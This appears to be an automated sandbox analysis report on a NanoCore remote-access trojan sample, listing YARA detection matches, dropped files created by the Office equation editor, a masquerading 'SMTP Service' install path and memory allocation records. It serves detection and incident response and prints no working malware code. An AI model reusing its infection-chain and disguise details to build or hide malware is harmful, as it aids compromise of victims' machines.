Source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.cat464923.exe.4a0000.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.cat464923.exe.34e019c.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.cat464923.exe.32d47c5.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.cat464923.exe.34a4d80.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.cat464923.exe.34a4d80.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.smtpsvc.exe.3174d80.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.smtpsvc.exe.3174d80.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.2.smtpsvc.exe.33a47c5.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.smtpsvc.exe.33a019c.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.smtpsvc.exe.2374e04.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 11.2.cat464923.exe.3304d80.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 11.2.cat464923.exe.3304d80.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

.NET source code contains very large strings

Show sources

Source: catx[1].exe.2.dr, Form1.cs	Long String: Length: 11840
Source: 4.2.cat464923.exe.8d0000.0.unpack, Form1.cs	Long String: Length: 11840
Source: 4.0.cat464923.exe.8d0000.0.unpack, Form1.cs	Long String: Length: 11840
Source: smtpsvc.exe.5.dr, Form1.cs	Long String: Length: 11840
Source: 5.0.cat464923.exe.8d0000.2.unpack, Form1.cs	Long String: Length: 11840
Source: 5.0.cat464923.exe.8d0000.4.unpack, Form1.cs	Long String: Length: 11840
Source: 5.0.cat464923.exe.8d0000.0.unpack, Form1.cs	Long String: Length: 11840
Source: 5.2.cat464923.exe.8d0000.6.unpack, Form1.cs	Long String: Length: 11840

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catx[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\cat464923.exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\cat464923.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002EDC28
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E0098
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E5920
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002EBD38
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E4D08
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E1553
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E3D8E
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E71C0
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E3A61
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E2670
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E36C8
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002EDF00
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E6300
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002EC038
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E9430
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E8068
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E9440
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E8059
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002EB8A8
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002EB8B8
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E98B8
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002EA8FA
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002EBD27
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002EA920
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E0500
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E4168
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002EA970
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E5D80
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E9248
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E9250
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002EC6B6
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002EC6E8
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002EDEF4
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E96C1
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E8ED8
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E96D0
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002EAFA8
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002ED79C
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E8BE0
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 4_2_002E8BD0
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 5_2_002DE058
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 5_2_002DC0C8
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 5_2_002D43A0
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 5_2_002DB4B0
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 5_2_002D3788
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 5_2_002DC186
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 5_2_002D4458
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002EDC2A
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E0098
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E5920
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002EBD38
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E4D08
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E157F
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E3D8F
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E71C0
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E2670
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E36C8
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002EDF00
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E6300
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E9430
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E8068
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E9440
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E8059
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002EB8A8
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002EB8B8
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E98B8
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E0498
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002EA8FA
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002EBD27
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002EA920
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E0501
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E4168
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002EA970
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E5D80
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E266F
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E9242
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E9250
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002EC6B6
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002EC6E8
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002EDEF2
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E96C1
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E8ED2
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E96D0
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E8BE0
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 11_2_002E8BD0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_0059DC28
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_00590098
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_00591553
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_00594D08
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_0059BD38
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_00595920
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_005971C0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_00593D8E
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_00592670
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_005936C8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_0059DF00
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_00596300
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_00598059
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_00599440
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_00598068
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_00599430
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_005904F9
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_0059A8FA
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_0059B8B8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_005998B8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_0059B8A8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_0059A970
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_00594168
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_0059A920
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_0059BD27
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_00595D80
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_00599250
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_00599242
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_00592660
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_005996D0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_00598ED2
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_0059C6CC
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_005996C1
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_0059DEF2
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_0059C6E8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_005936B8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_00598BD0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_00598BE0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002BDC28
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002B0098
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002B5920
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002BBD38
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002B4D08
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002B1553
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002B3D81
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002B71C0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002B2670
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002B36C8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002BDF00
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002B6300
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002B9430
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002B8068
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002B9440
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002B8059
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002BB8A8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002BB8B8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002B98B8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002B04FA
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002BA8FA
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002BA923
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002BBD27
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002B4168
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002BA970
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002B5D80
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002B9242
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002B9250
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002BC6A6
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002BC6E8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002BDEF2
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002B96C1
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002B8ED2
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002B96D0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002B8BE0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002B8BD0
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 16_2_002D43A0
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 16_2_002D3788
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 16_2_002D4458
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 17_2_003246C9
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 17_2_003243A0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 17_2_00323788
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 17_2_00324C78
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 17_2_00324458
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 18_2_003943A0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 18_2_00393788
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 18_2_00394C78
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 18_2_00394458

Source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2347454023.0000000000440000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2347454023.0000000000440000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.2220223642.0000000003359000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000002.2221684497.0000000003309000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2351063180.00000000034D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
